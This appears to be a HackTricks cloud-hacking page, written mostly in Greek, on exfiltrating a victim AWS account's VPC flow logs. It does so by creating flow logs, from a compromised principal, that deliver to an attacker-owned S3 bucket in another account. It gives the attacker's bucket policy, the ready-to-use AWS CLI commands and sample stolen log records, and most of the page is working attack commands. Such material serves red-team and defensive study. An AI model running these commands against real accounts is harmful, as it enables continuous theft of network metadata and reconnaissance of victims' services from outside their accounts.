AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Περίληψη

Κακοχρησιμοποιήστε ec2:CreateFlowLogs για να εξάγετε VPC, subnet, ή ENI flow logs απευθείας σε ένα S3 bucket που ελέγχεται από attacker. Μόλις το delivery role διαμορφωθεί ώστε να γράφει στο εξωτερικό bucket, κάθε σύνδεση που παρατηρείται στον παρακολουθούμενο πόρο εξάγεται έξω από το victim account.

Απαιτήσεις

  • Victim principal: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, and iam:PassRole (if a delivery role is required/created).
  • Attacker bucket: S3 policy that trusts delivery.logs.amazonaws.com with s3:PutObject and bucket-owner-full-control.
  • Προαιρετικό: logs:DescribeLogGroups if exporting to CloudWatch instead of S3 (not needed here).

Περιγραφή Επίθεσης

  1. Attacker προετοιμάζει μια πολιτική S3 bucket (στο attacker account) που επιτρέπει στην υπηρεσία VPC Flow Logs delivery να γράφει αντικείμενα. Αντικαταστήστε τα placeholders πριν την εφαρμογή:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}

Εφαρμόστε από τον λογαριασμό του επιτιθέμενου:

aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
  1. Victim (compromised principal) δημιουργεί τα flow logs που στοχεύουν το attacker bucket:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"

Μέσα σε λίγα λεπτά, αρχεία flow log εμφανίζονται στον attacker bucket τα οποία περιέχουν συνδέσεις για όλες τις ENIs στο παρακολουθούμενο VPC/subnet.

Αποδεικτικά στοιχεία

Δείγματα εγγραφών flow log που γράφτηκαν στον attacker bucket:

version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Απόδειξη λίστας Bucket:

aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Επιπτώσεις

  • Συνεχής εξαγωγή μεταδεδομένων δικτύου (source/destination IPs, ports, protocols) για το παρακολουθούμενο VPC/subnet/ENI.
  • Επιτρέπει traffic analysis, identification of sensitive services, και potential hunting για security group misconfigurations από έξω από τον λογαριασμό του θύματος.

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks